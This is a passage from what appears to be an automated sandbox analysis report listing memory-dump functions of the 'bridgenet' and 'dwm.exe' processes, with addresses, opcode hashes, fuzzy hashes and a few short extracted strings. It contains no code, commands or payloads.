Opcode ID: 36c52c8a9632081a0fa64d9c922f9fa4c0d1032b2de0294526d2beab3561881f
Instruction ID: e3c5f844d42e7a3697579e56b147c5cecab5d7cf7f8d9dc667eb2395423c4ab3
Opcode Fuzzy Hash: 36c52c8a9632081a0fa64d9c922f9fa4c0d1032b2de0294526d2beab3561881f
Instruction Fuzzy Hash: CEE02B3B559944CFC740DA79DCA54D47B50FB4221874611FAC049C6562D211596DC740

Function 00007FF888235349 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e15aaabfdcf4e42dbb955d6a94564e68e6bc38c027f86249e1104bbffc70e5
Instruction ID: f7b51566cf4ae036e02aa71b2d4be30fe1f39abc76ee0a3e6dcda3221fc6b8dd
Opcode Fuzzy Hash: f3e15aaabfdcf4e42dbb955d6a94564e68e6bc38c027f86249e1104bbffc70e5
Instruction Fuzzy Hash: 86F06521B0DF884FC719566D586C4B17BF1DF6A21234A43EFD046C76B3DD59AC848345

Function 00007FF8882378C9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e1a824e4c3eac914c9e0c0e281a93845a56fa99439f397e9c6870a03f3bf5f0
Instruction ID: e8745279ff8c8e2a523576482503a045613d5a9cde9f6c0283b92674fc909e0a
Opcode Fuzzy Hash: 0e1a824e4c3eac914c9e0c0e281a93845a56fa99439f397e9c6870a03f3bf5f0
Instruction Fuzzy Hash: CFE01220619B894FCB49662948695A07BE1EB6611178A52EBC045CB1A3DD19DC85C741

Function 00007FF88823614A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0cf876a7c47df1ba58cbf329d1384ee95293d6c350096d84a8c1b8242ce4a4d
Instruction ID: 9d233972bec3bdc4d7bf05ccc292771ca3746dc5acfb98dabbc81711adba6edb
Opcode Fuzzy Hash: e0cf876a7c47df1ba58cbf329d1384ee95293d6c350096d84a8c1b8242ce4a4d
Instruction Fuzzy Hash: A2F03730A08607CBE715AA04C4A4BF83395FB563D0F500575D50D8B2E6CF2D7945D704

Function 00007FF888234629 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8efe7f567c5ad740abf4953805bcc25e1a6b1bbf1d6f57471291b0d3a4f76d19
Instruction ID: 29a263d7aee4e90ff085e0edfdc6ce0af70536a5f8d19e41e257153d45d3bcaf
Opcode Fuzzy Hash: 8efe7f567c5ad740abf4953805bcc25e1a6b1bbf1d6f57471291b0d3a4f76d19
Instruction Fuzzy Hash: 80E04F21A5D7C44FCB0AA73888699603FB1DF6B21174A40EBC049CB1B3D519DC88C701

Function 00007FF888238609 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0869cd1ca62d473f63fe052a30146374c1117b8c96f01cb57685dd82c967f6f6
Instruction ID: 1155e121093c2d51edf5e680d8a3d1b4de5b594f776546cdd3c2701a2c291cbb
Opcode Fuzzy Hash: 0869cd1ca62d473f63fe052a30146374c1117b8c96f01cb57685dd82c967f6f6
Instruction Fuzzy Hash: 72E0BF21A5D7C04FC70A573488699643FB1DF6711178A41EAD045CB5B3D559DC49C741

Function 00007FF887E96D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: c43af8cbaca7c47f6eadd38362d2bdbc87c4f4fd73b0a784360e08ddb2486b7b
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction Fuzzy Hash: F9E01A22E4C41646FB94A298C8507BD6270FB88784F1440B8D95EA33C2CE3CAE44CB15

Function 00007FF887E90CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: da7509e690e82af9174b6a5eee70fccb5e1adee42d813e712b484251726a2f8e
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: ADE01235A4820BCBE700DB94C4846AD7771FB51765F508265D42587389DE7C6A84C780

Function 00007FF887E96DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: c5ba8bee57a174011d82307fa2b23cd50e5baa2f672c97f6827bef94fbb8b494
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: DED05E52D4C0034BFB545294C0503BD23B0AF55788F1400B5D91D932D2CE2CAC01C644

Function 00007FF887E906A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: 455d5c594bc8100b9786ee19b4aacd6b5395bbe0895537b30d3cda2e6aa34020
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: F4C08C03EDA41B00B40431EEA4022ACA1207FC4E94FD00232C91C400C2DC0D28E58146

Function 00007FF887E95472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5152d99484ec076451a66ba5fc8b9f7a86f697b70a8168d8719d2c34672e4ca5
Instruction ID: 30c2cfb0ee348e85a0d7f42d1fdc7658250dadd66268bc5b543eff89aebf7232
Opcode Fuzzy Hash: 5152d99484ec076451a66ba5fc8b9f7a86f697b70a8168d8719d2c34672e4ca5
Instruction Fuzzy Hash: A7C04C02F1881656F555629840253BF45529F55A44F954075E41DC63CBCF1C5E0542C7

Function 00007FF887E906C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 1817efc9902fc8e465e5442ec935fa6617e8598d4e15d6bfd98bafc1d6a3ecff
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 97B00206CE644F01A45831FE594626D74607B85958FD51270DC1D50185D84D59E55256

Non-executed Functions

Function 00007FF887E909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FF887E90B56
!k9, xrefs: 00007FF887E90B4E
"s9, xrefs: 00007FF887E90B46
#{9, xrefs: 00007FF887E90B3E

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
Instruction ID: 3ad88b8a64c571f5c5705b82e489f89ca865ee3bf73aab23ecaa1a4c1003ceef
Opcode Fuzzy Hash: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
Instruction Fuzzy Hash: 8C416B17A0857355F1513AFDF0013ED6B549FA13B9B8C8677E16C8A8C3ED3C688682E6

Analysis Process: dwm.exePID: 2416, Parent PID: 3504COMMON

Executed Functions

Function 00007FF887E80D48 Relevance: 6.5, Strings: 5, Instructions: 258COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887E80F17
"9B, xrefs: 00007FF887E80DD1
r6B, xrefs: 00007FF887E80EA7
r6B, xrefs: 00007FF887E80EC5
5\_H, xrefs: 00007FF887E80DF3

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID: "9B$5\_H$b4B$r6B$r6B
API String ID: 0-1707321486
Opcode ID: a61b8c03cd8ef9d39db1345a63b3db6da96dab9f1b0c30a29bd5abc37743362e
Instruction ID: 8496cb801df57debe940abb22a090ff4cf6f675d7ce0d721c41cf32c32ff3a32
Opcode Fuzzy Hash: a61b8c03cd8ef9d39db1345a63b3db6da96dab9f1b0c30a29bd5abc37743362e
Instruction Fuzzy Hash: 1D81CD7691CA898FFB99DB68C8697AD7FF1FB95354F8400AAC009D72D2CB781811CB41

Function 00007FF887E80E43 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF887E80F17
r6B, xrefs: 00007FF887E80EA7
r6B, xrefs: 00007FF887E80EC5

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: ed7c86d360ad48859c6556872633fe7de20b3c2790135a28267411e158e9cd6b
Instruction ID: f2ff1051d8dbc61ca8a289a0c36dce5c8000f772fc16ba1796633acb33c34ff2
Opcode Fuzzy Hash: ed7c86d360ad48859c6556872633fe7de20b3c2790135a28267411e158e9cd6b
Instruction Fuzzy Hash: 2451BC7691CA598FFB98DB68D8697AD7FE0FB99354F84016AC00DD33D2CBB814218B00

Function 00007FF888224CE4 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888224D18
r6B, xrefs: 00007FF888224D30

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 9c7234f2cfa3d6fca2032c93a11caecdab6399b9c2c98bb1fcaca85952977e76
Instruction ID: ac50d73d2a50ba083e926fdfb015ab92a4bf0fa4b7ed7c74688343c1ed32e5dd
Opcode Fuzzy Hash: 9c7234f2cfa3d6fca2032c93a11caecdab6399b9c2c98bb1fcaca85952977e76
Instruction Fuzzy Hash: CBD1A031E589194FEB98EB2898566F8B3E1FF98790F4401B9D41ED72D2CF286C42C785

Function 00007FF8882280F9 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF888228116

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 81045e2f0a54a68df8fcf3f23d53e7910f81678417adc6cbc028a9aa0af19add
Instruction ID: e0b1aaad1a976bcd51a64665a0842c169f3aa65233301cb9ea1ec623d8b9b1a7
Opcode Fuzzy Hash: 81045e2f0a54a68df8fcf3f23d53e7910f81678417adc6cbc028a9aa0af19add
Instruction Fuzzy Hash: 78F0A06195E2D14FDB16AA3488595A4BFA0EF67200B4941EEC095CB1D3EB1DC88ACB11

Function 00007FF888228339 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888228356

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 6b8fa2bb92d0c1fed382b88c453b9b8161eac0f0d1c14a10438e2816daed3962
Instruction ID: 18f8527659986f01e8042c11035f781e9fe0b65f885c4d02f71283382e636a91
Opcode Fuzzy Hash: 6b8fa2bb92d0c1fed382b88c453b9b8161eac0f0d1c14a10438e2816daed3962
Instruction Fuzzy Hash: D2E0127194E3C04FC755AA7484A98447F60EF6B21078A40DEC045CF1B3D71DD845D701

Function 00007FF888227959 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888227976

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 800c5b4d2fff134574f5f07d5e2d4a4f1ed0d3406f63cf27caffc8f49c37d996
Instruction ID: 5c8dc3f9ad6c25d3e0d1175d96862f20e85502fc423d1f75a9ac6b89348a9198
Opcode Fuzzy Hash: 800c5b4d2fff134574f5f07d5e2d4a4f1ed0d3406f63cf27caffc8f49c37d996
Instruction Fuzzy Hash: 39E01A6194E7C08FCB1AEB7488B99447FA1AF6B250B8E41EEC045CF1B3E62D9849C701

Function 00007FF8882213E5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad293a38c43ec54e339f6045b240c3f1a14cf261008eb8df9164fd0833fc6924
Instruction ID: a813facaca54f733b403f87234102bccad687bcb2e280fe6b68180ed5a79e86b
Opcode Fuzzy Hash: ad293a38c43ec54e339f6045b240c3f1a14cf261008eb8df9164fd0833fc6924
Instruction Fuzzy Hash: 6951F522C0D6864FE729D62848165F87BE0FF45291F5805FAD4ADC7193EF1C381AC396

Function 00007FF887E808D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb90f7fbe372e1a2a830f8457b675474fcbba1c7e6a901d83043f313601679a4
Instruction ID: b1649f126d9e6c3517c43adbf1299fc78e13885e0631e3da6171a5e16acb3811
Opcode Fuzzy Hash: eb90f7fbe372e1a2a830f8457b675474fcbba1c7e6a901d83043f313601679a4
Instruction Fuzzy Hash: 1B412222A4C5250FF654B6A8A0593FD7791EF947A4B8885BBD04DC71D3DE3CA8428285

Function 00007FF887E83B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6e6de8553f7a8ec5f059c983a0567bc154d5c3c99b05a4abd2d30dd2121b60
Instruction ID: 0c157b8b3d0da6786239881848c68eef7cff99d2e1f35c46b54e141152b91129
Opcode Fuzzy Hash: ad6e6de8553f7a8ec5f059c983a0567bc154d5c3c99b05a4abd2d30dd2121b60
Instruction Fuzzy Hash: 71311C61E989094AFBB4E728C4547BC72A2FF98B90F9501B5C01ED3292DE3CAD41C740

Function 00007FF887E80998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85c4ba3cfdce47cbc91a46c790e7d852c6ae619083cb3419ccf4bad800406b2
Instruction ID: 70a53722aafd28b52f925c1cd4c4258eab9af7b752cfebf9904ad48144c4c281
Opcode Fuzzy Hash: f85c4ba3cfdce47cbc91a46c790e7d852c6ae619083cb3419ccf4bad800406b2
Instruction Fuzzy Hash: 54210721B6C9190FF7A8F66C94597BD76D2FB98B51B9400BEE80DC32D2DD2C9C418281

Function 00007FF887E80C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe99098165eeaddba45b919a88797d7f30c9ae871910ec450f27254a35ffcda1
Instruction ID: 8074829f23a3054d5343e137ad680c97c77458f2305aea4a750c1e17429a4f28
Opcode Fuzzy Hash: fe99098165eeaddba45b919a88797d7f30c9ae871910ec450f27254a35ffcda1
Instruction Fuzzy Hash: 9221F736A4C2598FF722AA68D8451EC7B70EF41364F5881B7D058DB1C3E93C654BC791

Function 00007FF887E80C38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234f4b85c9698c6ca3e27281029eaa680ec5b8ff334a87399a5b2d6507af933d
Instruction ID: 41986a2ab529828f09483e6f715a2078f098b3113d91df8baab4d7ee424eb893
Opcode Fuzzy Hash: 234f4b85c9698c6ca3e27281029eaa680ec5b8ff334a87399a5b2d6507af933d
Instruction Fuzzy Hash: 0A11EC31A4C6898FF722DB68C8541EC7BB0EF42660F5841B6C054EB292E938660AC780

Function 00007FF887E80C40 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c870c35bae78f92903b6536162936f24897688d18e4289ba0e9de9b11ab223bb
Instruction ID: 99442a8ae06982783e10b534c4c45587ea86069baa22a95c54bdc46c5e087574
Opcode Fuzzy Hash: c870c35bae78f92903b6536162936f24897688d18e4289ba0e9de9b11ab223bb
Instruction Fuzzy Hash: F911AD35A4D6898FF722DF68C8541EC7FB0EF42750F5941F6C454EB292EA38664AC780

Function 00007FF887E8417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee0de0f2fbf9b95a30ae4047e3f5bd528832fd8cefaa7c0377fa4a05eb6e811
Instruction ID: d13ac17edfd01054552621ea1921afb0ec31c9b3c5fb8a2d97041c2635451b33
Opcode Fuzzy Hash: bee0de0f2fbf9b95a30ae4047e3f5bd528832fd8cefaa7c0377fa4a05eb6e811
Instruction Fuzzy Hash: 17014C30A58A198FEB98EB04C494EBD73B1FB69354F5441A9D40ED32A0CE38A944CF81

Function 00007FF887E80C48 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49d65dddec93a079a0376780fc7c99c62e4ac4c25181ee9ee34ffb5bd70fc4c
Instruction ID: e31bf54567258986d10fe88784d5b944bf45ca89c01b2b3d55dfd099d534dabb
Opcode Fuzzy Hash: c49d65dddec93a079a0376780fc7c99c62e4ac4c25181ee9ee34ffb5bd70fc4c
Instruction Fuzzy Hash: 3A019E35A4D6898FF722DF68C85419C7FB0FF42750F5841E6C454DB292EA386A49C781

Function 00007FF887E80C50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbbea6d369f8f2008804df7b27e60637ee1fa731cb60faf90f6241d3da22910
Instruction ID: a3b9142b4991a32775ae5fa34e1dd2fa29ca47e166c10c21ef126f1247dc91e2
Opcode Fuzzy Hash: 5cbbea6d369f8f2008804df7b27e60637ee1fa731cb60faf90f6241d3da22910
Instruction Fuzzy Hash: BD01783494D6898FF762DB68C8541ACBFB0FF02354F5841E6C454DB292EA3C6A49C781

Function 00007FF887E83C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: 79f7ae960b8ff0375359dd6172acad93076f06dbce304b4e0b515b7bc107ebff
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: 5AF0C931A8981A8AFB74EB14C854BBC72B1FF54751F9402B9C00ED7291CE7C6D86CA00

Function 00007FF887E80B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91be0ff71979d736f83629d13740d1c7894a204b16a4244e0a0706198e84ae73
Instruction ID: c6d239d3e28c7cc4eecd22d9228c8ae1981b29cbb7ae3762e1082d835d185ebf
Opcode Fuzzy Hash: 91be0ff71979d736f83629d13740d1c7894a204b16a4244e0a0706198e84ae73
Instruction Fuzzy Hash: D9E0617A55D544CFD344DB79DCA54E47B50FF4231874611FAD049C7423D221055DC700

Function 00007FF888225349 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629dfb9024750ee103e9dd1cbba89ed6b7330a5bb9198b1c6903ed41365f5bcc
Instruction ID: e311be73de673ce6643420cdb50aaa019e73790bb6310ba26c5ba4d7ccc2ee88
Opcode Fuzzy Hash: 629dfb9024750ee103e9dd1cbba89ed6b7330a5bb9198b1c6903ed41365f5bcc
Instruction Fuzzy Hash: 79F0A030B08B484FC7199629986C4717BE1DB6A21234A02EFD006C72B2DD58AC848341

Function 00007FF8882278C9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a75875e4725e5babb18983746474b58e4eac92b0f073258edcc965a956001f
Instruction ID: 7ed0869de02802a41802e9d7ad5bd20c5fb2c0524f8cba07d462ebd0db0a55fa
Opcode Fuzzy Hash: d5a75875e4725e5babb18983746474b58e4eac92b0f073258edcc965a956001f
Instruction Fuzzy Hash: EBE04830B15B894FC74D9629885D5707BF1EF6611278A52FBC005CB6A3DD19DCC5C741

Function 00007FF887E8403D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1915653026.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff887e80000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f116f25900bf37c8b9794bfabac5cc20d6c04b570d960ef697120ae2a83f5384
Instruction ID: 5bd55c56f41084c6e59dea57922273f5f8e98e2e2f15f778496ac5c3de63b92b
Opcode Fuzzy Hash: f116f25900bf37c8b9794bfabac5cc20d6c04b570d960ef697120ae2a83f5384
Instruction Fuzzy Hash: 1EF0AC31E9C52A4AF278AA64D45477CA2A1FF49790F904275D42ED26D2CD3C6881D641

Function 00007FF88822614A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ffdf6bfe175eb24350fa31336ab4076ec168d32d841ed7026da90645b2d246
Instruction ID: d47d29640a5320465484a0e17957ed49b205588d338932e7bfa543bdac153a93
Opcode Fuzzy Hash: b5ffdf6bfe175eb24350fa31336ab4076ec168d32d841ed7026da90645b2d246
Instruction Fuzzy Hash: 1CF0A031A09605CBF7559A08C494BF87391FB593D0F608278E9198B2D2CF2EB941D304

Function 00007FF888224629 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1942554892.00007FF888220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff888220000_dwm.jbxd

